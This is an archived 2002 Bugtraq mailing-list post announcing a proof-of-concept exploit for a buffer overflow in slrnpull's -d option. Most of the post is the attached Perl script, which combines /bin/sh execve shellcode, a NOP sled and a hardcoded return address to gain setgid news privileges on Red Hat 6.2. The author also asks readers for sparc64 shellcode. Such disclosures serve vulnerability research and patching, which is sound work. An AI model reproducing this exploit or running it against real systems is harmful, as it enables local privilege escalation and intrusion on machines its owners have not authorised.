[25265] in bugtraq
slrnpull -d PoC
daemon@ATHENA.MIT.EDU (KF)
Fri Apr 26 01:08:03 2002
Message-ID: <3CC75E21.2060200@snosoft.com>
Date: Wed, 24 Apr 2002 18:38:41 -0700
From: KF <dotslash@snosoft.com>
MIME-Version: 1.0
To: vuln-dev@security-focus.com, bugtraq@securityfocus.org
Content-Type: multipart/mixed;
boundary="------------040500060609050704060702"
--------------040500060609050704060702
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Heres an exploit for the slrnpull -d post ...
http://online.securityfocus.com/archive/1/268963. Much thanks to
zillion@snosoft.com / safemode.org. Can anyone point me at some generic
sparc64 linux execve shellcode?
-KF
--------------040500060609050704060702
Content-Type: text/plain;
name="pUll.pl"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
filename="pUll.pl"
#!/bin/sh
echo DEFANGED.5
exit
#!/usr/bin/perl
#
# Credits for the vulnerability: Alex Hernandez (its setgid news not root)
# The exploit was written by: zillion@snosoft.com / safemode.org
# http://www.safemode.org
# http://www.snosoft.com
#
# Gain setgid news on a Red Hat 6.2 Intel box
$shellcode =
"\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46".
"\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1".
"\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
$offset = "-500";
$esp = 0xbfffe2cc;
for ($i = 0; $i < (2041 - (length($shellcode)) - 4); $i++) {
$buffer .= "\x90";
}
$buffer .= $shellcode;
$buffer .= pack('l', ($esp + $offset));
print("The new return address: 0x", sprintf('%lx',($esp + $offset)), "\n");
exec("/usr/bin/slrnpull -d '$buffer'");
--------------040500060609050704060702--
